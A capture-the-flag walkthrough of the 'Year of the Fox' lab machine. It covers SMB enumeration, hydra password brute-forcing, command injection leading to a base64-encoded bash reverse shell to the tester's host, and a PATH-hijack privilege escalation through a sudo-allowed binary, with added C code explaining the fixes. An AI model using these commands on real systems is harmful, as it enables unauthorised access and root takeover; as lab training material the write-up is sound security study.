Year of the Fox

Reconnaissance

No description is given for this machine, so let's start with an aggressive scan.

NMAP output
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 12:12 CET
Warning: 10.10.47.18 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.47.18
Host is up (0.059s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=You want in? Gotta guess the password!
|_http-title: 401 Unauthorized
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
| smb2-time:
|   date: 2021-12-27T11:13:09
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: year-of-the-fox
|   NetBIOS computer name: YEAR-OF-THE-FOX
|   Domain name: lan
|   FQDN: year-of-the-fox.lan
|_  System time: 2021-12-27T11:13:09+00:00

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   155.92 ms 10.8.0.1
2   156.21 ms 10.10.47.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.80 seconds

So we have a web application on port 80 that requires credentials to enter, and a Samba share. Before trying to brute-force the web app, let's see what's behind the Samba port.

smbclient -L /10.10.47.18/
Password for [WORKGROUP\max]:

        Sharename       Type      Comment
        ---------       ----      -------
        yotf            Disk      Fox's Stuff -- keep out!
        IPC$            IPC       IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
max@1337 ~/yotf> smbclient //10.10.47.18/yotf
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\max]:
tree connect failed: NT_STATUS_ACCESS_DENIED

Well, that's unlucky. We still need some usernames to brute-force the web app login with, so let's move on to the scanning part.

Scanning

The first tool we're gonna use here is enum4linux, since it may give us some Samba users.

perl enum4linux.pl 10.10.47.18
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)

Perfect, now we have two users to brute-force the web app login with. fox is a bit too obvious, so I'm gonna start with rascal first. I'm going to use hydra for this, as I did previously in the Internal CTF.

hydra -l rascal -P ../rockyou.txt 10.10.47.18 http-get -t 30 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-27 12:29:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344398 login tries (l:1/p:14344398), ~478147 tries per task
[DATA] attacking http-get://10.10.47.18:80/
[80][http-get] host: 10.10.47.18   login: rascal   password: april19
1 of 1 target successfully completed, 1 valid password found

Finally we have something to work with; let's analyze the web app now.

We are greeted with a PHP website that takes a string, wraps it in a JSON payload and apparently searches for it.

Exploiting

After searching a bit, it looks like there could be OS command injection through the JSON payload due to insecure input sanitizing, as per this website, so let's see if that's true.

Trying manual payloads in the website automatically changes some characters, like "/", to a null character, so let's fire up Burp and try from there.

After trying a long list of payloads, I finally found a valid way to inject OS commands; now we just have to escalate it to a reverse shell.

Trying the usual reverse shell payloads returns ["Invalid Character"], so it looks like we will have to base64-encode the payload and have the server decode it and pipe it to bash. Let's get to it.

echo 'bash -i >& /dev/tcp/10.8.208.63/1337 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIwOC42My8xMzM3IDA+JjEK

Perfect, now we are in. Grab the web flag from /var/www, and we can start the privilege escalation to root.
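The pattern behind that "Invalid Character" filter, and the fix that actually holds, as an added example in C. This is not the machine's PHP code (we never saw its source): the blacklist character set, the allowlist rules and the grep invocation are assumptions made for illustration, and the base64 string is the one from the command above. The point it shows is that a character blacklist never closes command injection; only refusing to hand the input to a shell does.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed guess at the web app's filter: refuse a few shell
 * metacharacters, accept everything else. Returns 1 if the term passes. */
int blacklist_passes(const char *term)
{
    return strpbrk(term, "/;&`$") == NULL;
}

/* Allowlist instead: only what a search term legitimately needs.
 * Letters, digits, space, '-' and '_', 1..64 bytes. Returns 1 if acceptable. */
int allowlist_passes(const char *term)
{
    size_t len = strlen(term);
    if (len == 0 || len > 64)
        return 0;
    for (const char *p = term; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != ' ' && c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/* Vulnerable shape: the term is pasted into a shell command string, so any
 * metacharacter the filter missed (newline, pipe, ...) becomes shell syntax.
 * Shown for contrast only; never called here. */
int run_search_shell(const char *term, const char *file)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "grep -F \"%s\" %s", term, file);
    return system(cmd);
}

/* Hardened shape: no shell at all. argv goes straight to execv, so the term
 * is one argument whatever bytes it contains, and "--" stops grep from
 * reading a leading '-' as an option. Returns grep's exit status
 * (0 match, 1 no match, 2 error), or -1 if the child could not be run. */
int run_search_noshell(const char *term, const char *file)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"/bin/grep", "-F", "--", (char *)term, (char *)file, NULL};
        execv(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a benign term and the base64 blob from the write-up. */
    const char *benign = "year of the fox";
    const char *blob = "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIwOC42My8xMzM3IDA+JjEK";
    printf("benign      : blacklist=%d allowlist=%d\n",
           blacklist_passes(benign), allowlist_passes(benign));
    printf("base64 blob : blacklist=%d allowlist=%d\n",
           blacklist_passes(blob), allowlist_passes(blob));
    if (allowlist_passes(benign))
        printf("grep exit status: %d\n", run_search_noshell(benign, "/etc/hostname"));
    return 0;
}
```

The blob contains none of the blacklisted characters, so the filter waves it through while the allowlist rejects it on the '+'. Even a perfect allowlist is only defence in depth, though: the real fix is run_search_noshell, where the term can never be parsed as a command.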

Privilege Escalation

After not finding anything in the usual filesystem directories, I decided to try linpeas.

cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
ListenAddress 127.0.0.1
AllowUsers fox

It looks like SSH is only listening on localhost and only allows the user fox, so let's tunnel that SSH service out to our machine and brute-force it, now that we know the username. As we don't have any SSH user yet, we can't use ssh -L, so let's try socat instead.

www-data@year-of-the-fox:/tmp$ ./socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22
max@1337 ~/yotf [1]> socat - TCP:10.10.47.18:2222
hydra -l fox -P rockyou.txt ssh://10.10.47.18:2222 -t 30 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-27 13:34:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344398 login tries (l:1/p:14344398), ~478147 tries per task
[DATA] attacking ssh://10.10.47.18:2222/
[STATUS] 334.00 tries/min, 334 tries in 00:01h, 14344068 to do in 715:47h, 30 active
[2222][ssh] host: 10.10.47.18   login: fox   password: allison
^C⏎ 
max@1337 ~> ssh fox@10.10.47.18 -p 2222
fox@10.10.47.18's password:


        __   __                       __   _   _            _____
        \ \ / /__  __ _ _ __    ___  / _| | |_| |__   ___  |  ___|____  __
         \ V / _ \/ _` | '__|  / _ \| |_  | __| '_ \ / _ \ | |_ / _ \ \/ /
          | |  __/ (_| | |    | (_) |  _| | |_| | | |  __/ |  _| (_) >  <
          |_|\___|\__,_|_|     \___/|_|    \__|_| |_|\___| |_|  \___/_/\_\



fox@year-of-the-fox:~$

Perfect, now we are a more privileged user on the server; let's see what else we can enumerate.

sudo -l
Matching Defaults entries for fox on year-of-the-fox:
    env_reset, mail_badpass

User fox may run the following commands on year-of-the-fox:
    (root) NOPASSWD: /usr/sbin/shutdown

After a while, this is all I discovered. There's no entry for it on GTFOBins, which made me guess that perhaps it's a custom binary.

Let's transfer it to our attacking machine to inspect it; you can do it like this:

cp /usr/sbin/shutdown .
fox@year-of-the-fox:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.208.63 - - [27/Dec/2021 12:42:03] "GET /shutdown HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
fox@year-of-the-fox:~$
max@1337 ~/yotf [6]> wget http://10.10.47.18:8000/shutdown
--2021-12-27 13:42:03--  http://10.10.47.18:8000/shutdown
Connecting to 10.10.47.18:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8304 (8.1K) [application/octet-stream]
Saving to: ‘shutdown’

shutdown                                                   100%[========================================================================================================================================>]   8.11K  --.-KB/s    in 0s

2021-12-27 13:42:03 (67.2 MB/s) - ‘shutdown’ saved [8304/8304]

max@1337 ~/yotf> strings shutdown
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
poweroff
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
shutdown.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

So it looks like it's actually just calling system("poweroff"). system() hands that string to /bin/sh, which resolves the bare name poweroff through the caller's PATH, and the sudo -l output above shows no secure_path, so sudo keeps our PATH. That means we can put our own poweroff (a copy of bash) first in PATH and have it invoked as root.

fox@year-of-the-fox:~$ cd /tmp
fox@year-of-the-fox:/tmp$ cp /bin/bash /tmp/poweroff
fox@year-of-the-fox:/tmp$ chmod +x poweroff
fox@year-of-the-fox:/tmp$ export PATH=/tmp:$PATH
fox@year-of-the-fox:/tmp$ sudo -l
Matching Defaults entries for fox on year-of-the-fox:
    env_reset, mail_badpass

User fox may run the following commands on year-of-the-fox:
    (root) NOPASSWD: /usr/sbin/shutdown
fox@year-of-the-fox:/tmp$ sudo /usr/sbin/shutdown
root@year-of-the-fox:/tmp# cd /root
root@year-of-the-fox:/root# ls
root.txt
root@year-of-the-fox:/root# cat root.txt
Not here -- go find!
root@year-of-the-fox:/root# find / -name root.* 2>/dev/null
/root/root.txt
root@year-of-the-fox:/root# find / -name *.root 2>/dev/null
/home/rascal/.did-you-think-I-was-useless.root
root@year-of-the-fox:/root# cat /home/rascal/.did-you-think-I-was-useless.root
T
H
M
{ODM3NTdk
MDljYmM4Z
jdhZWFhY2
VjY2Fk}

Here's the prize:

YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMw
Mwo=

Good luck!
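What the strings output implies about shutdown.c, next to a hardened version, plus a small simulator of how /bin/sh resolves a bare command name through PATH. This is an added example: it is not the machine's shutdown.c (we only have its strings output, so the body is a reconstruction) and not sudo's own code. The filesystem table and the PATH strings are constructed, and the two shutdown functions are there for contrast only; the demo never invokes them.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Reconstruction of what the strings output implies shutdown.c does.
 * system() passes the string to /bin/sh, which resolves a bare "poweroff"
 * through PATH; under the sudo rule in the write-up that PATH is fox's own.
 * Never called here. */
int insecure_shutdown(void)
{
    return system("poweroff");
}

/* Hardened version: absolute path, no shell, and a fixed environment so the
 * caller's PATH cannot influence which binary runs. Never called here. */
int hardened_shutdown(void)
{
    char *const argv[] = {"/sbin/poweroff", NULL};
    char *const envp[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
    execve(argv[0], argv, envp);
    return -1; /* only reached if execve failed */
}

/* Simulated PATH lookup over a constructed filesystem. 'present' lists the
 * executables that exist; the first PATH directory holding the command wins,
 * which is exactly how the shell picks /tmp/poweroff once /tmp comes first.
 * Returns the resolved path written into 'out', or NULL if nothing matched. */
const char *resolve_in_path(const char *cmd, const char *path,
                            const char *const *present, char *out, size_t n)
{
    char copy[512];
    snprintf(copy, sizeof copy, "%s", path);
    for (char *dir = strtok(copy, ":"); dir; dir = strtok(NULL, ":")) {
        snprintf(out, n, "%s/%s", dir, cmd);
        for (const char *const *p = present; *p; p++)
            if (strcmp(*p, out) == 0)
                return out;
    }
    return NULL;
}

/* The scenario from the write-up as a constructed filesystem: the real
 * /sbin/poweroff plus the copy of bash dropped in /tmp. */
const char *which_poweroff(const char *path)
{
    static const char *const fs[] = {"/sbin/poweroff", "/tmp/poweroff", NULL};
    static char buf[600];
    const char *hit = resolve_in_path("poweroff", path, fs, buf, sizeof buf);
    return hit ? hit : "(not found)";
}

int main(void)
{
    const char *default_path =
        "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
    const char *hijacked_path =
        "/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
    printf("PATH as shipped  : %s\n", which_poweroff(default_path));
    printf("PATH=/tmp:$PATH  : %s\n", which_poweroff(hijacked_path));
    return 0;
}
```

Two independent fixes would each have closed this: the binary using an absolute path with execve instead of system(), or the sudoers file setting secure_path so that sudo replaces the invoking user's PATH. The sudo -l output above lists only env_reset and mail_badpass, and env_reset on its own keeps PATH, which is why the export in /tmp reached the root shell.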

This one took a bit of time, but it's finally rooted. Hope you enjoyed it!